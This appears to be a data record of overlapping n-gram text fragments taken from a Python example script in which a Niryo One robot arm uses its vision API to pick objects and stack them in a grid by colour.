ngram
listlengths
0
67.8k
[ "how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0]", "pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the end of", "many objects can be put on the same line before increasing the conditioning", "} # Loop until too much failures while try_without_success < 3: # Moving", "def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\":", "status or not obj_found: try_without_success += 1 continue # Choose Y position according", "Z position according to how the color line is filled offset_x = count_dict[color_val]", "be pack over the lower level \"\"\" from niryo_one_tcp_client import * # --", "Unpacking return result status, obj_found, shape, color = ret if not status or", "z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose =", "# IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used", "tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's", "{ \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much", "try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get", "== \"RED\": offset_y = 0 else: offset_y = 1 # Choose X &", "# Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) #", "Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One", "robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending", "= -1 elif color_val == \"RED\": offset_y = 0 else: offset_y = 1", "IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for", "X axis corresponds to how many objects can be put on the same", "objects can be put on the same line before increasing the conditioning height.", "ret = 
niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape,", "= RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace", "according to the objects' color. The objects will be conditioned in a grid", "variables grid_dimension = (3, 3) # -- Should Change these variables # The", "return result status, obj_found, shape, color = ret if not status or not", "= count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05", "The objects will be conditioned in a grid of dimension grid_dimension. The Y", "to how many objects can be put on the same line before increasing", "workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change these variables", "= color.value if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\":", "at the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0,", "for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change", "-- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the", "if not status or not obj_found: try_without_success += 1 continue # Choose Y", "Y axis corresponds to the Color : BLUE / RED / GREEN. It", "variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used =", "the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] //", "* # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address", "if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints)", "try_without_success = 0 if __name__ == '__main__': # Connect to robot client =", "will be pack over the lower level \"\"\" from niryo_one_tcp_client import * #", "grid of dimension grid_dimension. 
The Y axis corresponds to the Color : BLUE", "tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main", "Workspace Name # -- Can change these variables grid_dimension = (3, 3) #", "used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can", "- grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place", "of how to use Niryo One's vision to make a conditioning according to", "offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose =", "Name # -- Can change these variables grid_dimension = (3, 3) # --", "= PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the", "conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) #", "One's vision to make a conditioning according to the objects' color. The objects", "* offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val]", "\"workspace_1\" # Robot's Workspace Name # -- Can change these variables grid_dimension =", "corresponds to how many objects can be put on the same line before", "# Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client)", "== \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0 else:", "Y position according to Color color_val = color.value if color_val == \"BLUE\": offset_y", "ret if not status or not obj_found: try_without_success += 1 continue # Choose", "\"RED\": offset_y = 0 else: offset_y = 1 # Choose X & Z", "status, obj_found, shape, color = ret if not status or not obj_found: try_without_success", "use Niryo One's vision to make a conditioning according to the objects' color.", "grid_dimension[0] # Going to place the object place_pose = 
center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05", "= 0 if __name__ == '__main__': # Connect to robot client = NiryoOneClient()", "\"RED\": 0, \"GREEN\": 0, } # Loop until too much failures while try_without_success", "count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] #", "to make a conditioning according to the objects' color. The objects will be", "# -- Can change these variables grid_dimension = (3, 3) # -- Should", "color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0", "observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret", "place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) #", "# Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name #", "objects will be pack over the lower level \"\"\" from niryo_one_tcp_client import *", "= count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0]", "objects' color. The objects will be conditioned in a grid of dimension grid_dimension.", "Choose Y position according to Color color_val = color.value if color_val == \"BLUE\":", "object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose))", "will be conditioned in a grid of dimension grid_dimension. The Y axis corresponds", "-- Can change these variables grid_dimension = (3, 3) # -- Should Change", "= ret if not status or not obj_found: try_without_success += 1 continue #", "height. 
Once a line is completed, objects will be pack over the lower", "color.value if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y", "of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # --", "conditioning height. Once a line is completed, objects will be pack over the", "filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val]", "1 continue # Choose Y position according to Color color_val = color.value if", "This script shows an example of how to use Niryo One's vision to", "continue # Choose Y position according to Color color_val = color.value if color_val", "* offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success", "be conditioned in a grid of dimension grid_dimension. The Y axis corresponds to", "until too much failures while try_without_success < 3: # Moving to observation pose", "count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': # Connect", "# Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0.,", "in a grid of dimension grid_dimension. 
The Y axis corresponds to the Color", "x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area", "\"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much failures", "from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return", "PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning", "0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = {", "pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret =", "or not obj_found: try_without_success += 1 continue # Choose Y position according to", "its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN", "robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1", "color line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2", "Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One", "dimension grid_dimension. 
The Y axis corresponds to the Color : BLUE / RED", "to how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0] -", "One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status,", "0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1", "while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to", "if color_val == \"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y =", "# Unpacking return result status, obj_found, shape, color = ret if not status", "& Z position according to how the color line is filled offset_x =", "the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these", "# -- Should Change these variables # The pose from where the image", "BLUE / RED / GREEN. It will be 3 The X axis corresponds", "line is completed, objects will be pack over the lower level \"\"\" from", "will be 3 The X axis corresponds to how many objects can be", "grid_dimension = (3, 3) # -- Should Change these variables # The pose", "process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0,", "client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing connection", "0, \"GREEN\": 0, } # Loop until too much failures while try_without_success <", "much failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) #", "__name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing", "Change these variables # The pose from where the image processing happen observation_pose", "API ret = 
niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found,", "color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret if not", "Choose X & Z position according to how the color line is filled", "elif color_val == \"RED\": offset_y = 0 else: offset_y = 1 # Choose", "else: offset_y = 1 # Choose X & Z position according to how", "over the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change", "conditioned in a grid of dimension grid_dimension. The Y axis corresponds to the", "The Y axis corresponds to the Color : BLUE / RED / GREEN.", "from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\"", "a conditioning according to the objects' color. The objects will be conditioned in", "count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until", "== '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool", "to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025", "to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot", "GREEN. It will be 3 The X axis corresponds to how many objects", "before increasing the conditioning height. 
Once a line is completed, objects will be", "# Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing connection client.quit()", "Color color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif color_val", "PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0,", "these variables grid_dimension = (3, 3) # -- Should Change these variables #", "grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to", "0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0", "to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API", "\"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool", "/ GREEN. It will be 3 The X axis corresponds to how many", "of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57", "# -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of", "result status, obj_found, shape, color = ret if not status or not obj_found:", "1 # Choose X & Z position according to how the color line", "a grid of dimension grid_dimension. 
The Y axis corresponds to the Color :", "the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 )", "Can change these variables grid_dimension = (3, 3) # -- Should Change these", "shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret if", "lower level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables", "3 The X axis corresponds to how many objects can be put on", "client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process", "count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 *", "z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the", "\"BLUE\": offset_y = -1 elif color_val == \"RED\": offset_y = 0 else: offset_y", "Robot's Workspace Name # -- Can change these variables grid_dimension = (3, 3)", "< 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object", "Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate", "the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z)", "position according to how the color line is filled offset_x = count_dict[color_val] %", "# Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) #", "end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] #", "the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0,", "niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name,", "= [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN 
PROGRAM def process(niryo_one_client):", "X & Z position according to how the color line is filled offset_x", "Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y,", "the objects' color. The objects will be conditioned in a grid of dimension", "axis corresponds to the Color : BLUE / RED / GREEN. It will", "/ RED / GREEN. It will be 3 The X axis corresponds to", "The pose from where the image processing happen observation_pose = PoseObject( x=0.20, y=0.,", "too much failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list())", "robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if", "on the same line before increasing the conditioning height. Once a line is", "niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" #", "pose from where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3,", "= { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop until too", "the Color : BLUE / RED / GREEN. It will be 3 The", "these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo One tool_used", "niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color =", "0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success =", "failures while try_without_success < 3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying", "pack over the lower level \"\"\" from niryo_one_tcp_client import * # -- MUST", "// 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object", "make a conditioning according to the objects' color. 
The objects will be conditioned", "how many objects can be put on the same line before increasing the", "Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name # --", "can be put on the same line before increasing the conditioning height. Once", "'__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used)", "0 else: offset_y = 1 # Choose X & Z position according to", "# Robot's Workspace Name # -- Can change these variables grid_dimension = (3,", "+= 1 continue # Choose Y position according to Color color_val = color.value", "offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] //", "offset_y = 1 # Choose X & Z position according to how the", "a line is completed, objects will be pack over the lower level \"\"\"", "shows an example of how to use Niryo One's vision to make a", "# Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from Niryo", "x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes", "if __name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address) #", "0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict =", "the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0]", "0, \"RED\": 0, \"GREEN\": 0, } # Loop until too much failures while", "Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY,", "(3, 3) # -- Should Change these variables # The pose from where", "Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) #", "vision to make a conditioning according to the objects' color. 
The objects will", "# Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__':", "= 1 # Choose X & Z position according to how the color", "according to how the color line is filled offset_x = count_dict[color_val] % grid_dimension[0]", "= (3, 3) # -- Should Change these variables # The pose from", "1 try_without_success = 0 if __name__ == '__main__': # Connect to robot client", "grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the", "is completed, objects will be pack over the lower level \"\"\" from niryo_one_tcp_client", "be 3 The X axis corresponds to how many objects can be put", "completed, objects will be pack over the lower level \"\"\" from niryo_one_tcp_client import", "0 if __name__ == '__main__': # Connect to robot client = NiryoOneClient() client.connect(robot_ip_address)", "yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25,", "= PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the", "client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO)", "the same line before increasing the conditioning height. Once a line is completed,", "# Trying to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0,", "not status or not obj_found: try_without_success += 1 continue # Choose Y position", "Color : BLUE / RED / GREEN. It will be 3 The X", "y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose", "Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57,", "the conditioning height. 
Once a line is completed, objects will be pack over", "processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) #", "RED / GREEN. It will be 3 The X axis corresponds to how", "picking workspace_name = \"workspace_1\" # Robot's Workspace Name # -- Can change these", "# Choose Y position according to Color color_val = color.value if color_val ==", "\"\"\" This script shows an example of how to use Niryo One's vision", "the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name =", "yaw=-1.57 ) # Joints where the robot goes at the end of its", "roll=0.0, pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject(", "= center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment", "-- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0,", "NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration", "[0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success", "3: # Moving to observation pose niryo_one_client.move_pose(*observation_pose.to_list()) # Trying to get object from", "axis corresponds to how many objects can be put on the same line", "place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 *", "to the objects' color. 
The objects will be conditioned in a grid of", ") # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12,", "% grid_dimension[0] - grid_dimension[0] // 2 offset_z = count_dict[color_val] // grid_dimension[0] # Going", "niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ ==", "Once a line is completed, objects will be pack over the lower level", "0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict", "center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where", "example of how to use Niryo One's vision to make a conditioning according", "robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True)", "address of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking", "observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center of", "// grid_dimension[0] # Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x,", "goes at the end of its process sleep_joints = [0.0, 0.55, -1.2, 0.0,", "needs calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) #", "3) # -- Should Change these variables # The pose from where the", "= \"workspace_1\" # Robot's Workspace Name # -- Can change these variables grid_dimension", "One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" #", "# Going to place the object place_pose = center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 *", "shape, color = ret if not status or not obj_found: try_without_success += 1", "-1 elif color_val == 
\"RED\": offset_y = 0 else: offset_y = 1 #", "color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif color_val ==", "The X axis corresponds to how many objects can be put on the", "= \"192.168.1.202\" # IP address of the Niryo One tool_used = RobotTool.GRIPPER_1 #", "conditioning according to the objects' color. The objects will be conditioned in a", "Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': #", "-- Should Change these variables # The pose from where the image processing", "where the robot goes at the end of its process sleep_joints = [0.0,", "obj_found: try_without_success += 1 continue # Choose Y position according to Color color_val", "happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, ) # Center", "offset_y = 0 else: offset_y = 1 # Choose X & Z position", "Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result", "get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) #", "offset_y = -1 elif color_val == \"RED\": offset_y = 0 else: offset_y =", "from where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0,", "these variables # The pose from where the image processing happen observation_pose =", "# -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\":", "It will be 3 The X axis corresponds to how many objects can", "color_val == \"RED\": offset_y = 0 else: offset_y = 1 # Choose X", "# Choose X & Z position according to how the color line is", "y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at", "center_conditioning_pose.copy_with_offsets(0.05 * offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment 
count", "MAIN PROGRAM def process(niryo_one_client): try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\":", "offset_x, 0.05 * offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] +=", "script shows an example of how to use Niryo One's vision to make", "MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP address of the Niryo", "Loop until too much failures while try_without_success < 3: # Moving to observation", "objects will be conditioned in a grid of dimension grid_dimension. The Y axis", "<filename>ros/niryo_one_ros/niryo_one_tcp_server/clients/python/examples/vision_demonstrators/2_multiple_reference_conditioning.py \"\"\" This script shows an example of how to use Niryo One's", "# Loop until too much failures while try_without_success < 3: # Moving to", "= 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } #", "an example of how to use Niryo One's vision to make a conditioning", "Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs calibration client.calibrate(CalibrateMode.AUTO) # Launching", "client = NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot", "# Joints where the robot goes at the end of its process sleep_joints", "variables # The pose from where the image processing happen observation_pose = PoseObject(", "Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\"", "-1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def process(niryo_one_client): try_without_success = 0", "corresponds to the Color : BLUE / RED / GREEN. It will be", "grid_dimension. The Y axis corresponds to the Color : BLUE / RED /", "= NiryoOneClient() client.connect(robot_ip_address) # Changing tool client.change_tool(tool_used) # Calibrate robot if robot needs", "put on the same line before increasing the conditioning height. 
Once a line", "process sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM", "obj_found, shape, color = ret if not status or not obj_found: try_without_success +=", "be put on the same line before increasing the conditioning height. Once a", "\"GREEN\": 0, } # Loop until too much failures while try_without_success < 3:", "count_dict[color_val] += 1 try_without_success = 0 if __name__ == '__main__': # Connect to", "to use Niryo One's vision to make a conditioning according to the objects'", "PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot", "Niryo One's vision to make a conditioning according to the objects' color. The", "* offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if", "\"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address =", "+= 1 try_without_success = 0 if __name__ == '__main__': # Connect to robot", "= niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color", "RobotTool.GRIPPER_1 # Tool used for picking workspace_name = \"workspace_1\" # Robot's Workspace Name", "sleep_joints = [0.0, 0.55, -1.2, 0.0, 0.0, 0.0] # -- MAIN PROGRAM def", "Joints where the robot goes at the end of its process sleep_joints =", "increasing the conditioning height. Once a line is completed, objects will be pack", "line before increasing the conditioning height. Once a line is completed, objects will", "roll=-0., pitch=1.57, yaw=-1.57 ) # Joints where the robot goes at the end", ") # Joints where the robot goes at the end of its process", "calibration client.calibrate(CalibrateMode.AUTO) # Launching main process process(client) # Ending client.move_joints(*sleep_joints) client.set_learning_mode(True) # Releasing", "same line before increasing the conditioning height. 
Once a line is completed, objects", "2 offset_z = count_dict[color_val] // grid_dimension[0] # Going to place the object place_pose", "area center_conditioning_pose = PoseObject( x=0.0, y=-0.25, z=0.12, roll=-0., pitch=1.57, yaw=-1.57 ) # Joints", "of dimension grid_dimension. The Y axis corresponds to the Color : BLUE /", "color. The objects will be conditioned in a grid of dimension grid_dimension. The", "image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57, yaw=0.0, )", "to the Color : BLUE / RED / GREEN. It will be 3", "try_without_success += 1 continue # Choose Y position according to Color color_val =", "to get object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY)", "change these variables grid_dimension = (3, 3) # -- Should Change these variables", "of the Niryo One tool_used = RobotTool.GRIPPER_1 # Tool used for picking workspace_name", "position according to Color color_val = color.value if color_val == \"BLUE\": offset_y =", "offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success = 0 if __name__", "pitch=1.57, yaw=0.0, ) # Center of the conditioning area center_conditioning_pose = PoseObject( x=0.0,", "not obj_found: try_without_success += 1 continue # Choose Y position according to Color", "according to Color color_val = color.value if color_val == \"BLUE\": offset_y = -1", "the robot goes at the end of its process sleep_joints = [0.0, 0.55,", "# The pose from where the image processing happen observation_pose = PoseObject( x=0.20,", "Should Change these variables # The pose from where the image processing happen", "where the image processing happen observation_pose = PoseObject( x=0.20, y=0., z=0.3, roll=0.0, pitch=1.57,", ": BLUE / RED / GREEN. 
It will be 3 The X axis", "offset_y, 0.025 * offset_z) niryo_one_client.place_from_pose(*niryo_one_client.pose_to_list(place_pose)) # Increment count count_dict[color_val] += 1 try_without_success =", "level \"\"\" from niryo_one_tcp_client import * # -- MUST Change these variables robot_ip_address", "import * # -- MUST Change these variables robot_ip_address = \"192.168.1.202\" # IP", "how to use Niryo One's vision to make a conditioning according to the", "0, } # Loop until too much failures while try_without_success < 3: #", "is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z =", "object from Niryo One API ret = niryo_one_client.vision_pick(workspace_name, height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking", "to Color color_val = color.value if color_val == \"BLUE\": offset_y = -1 elif", "line is filled offset_x = count_dict[color_val] % grid_dimension[0] - grid_dimension[0] // 2 offset_z", "try_without_success = 0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, }", "height_offset=0.0, shape=Shape.ANY, color=Color.ANY) # Unpacking return result status, obj_found, shape, color = ret", "= 0 else: offset_y = 1 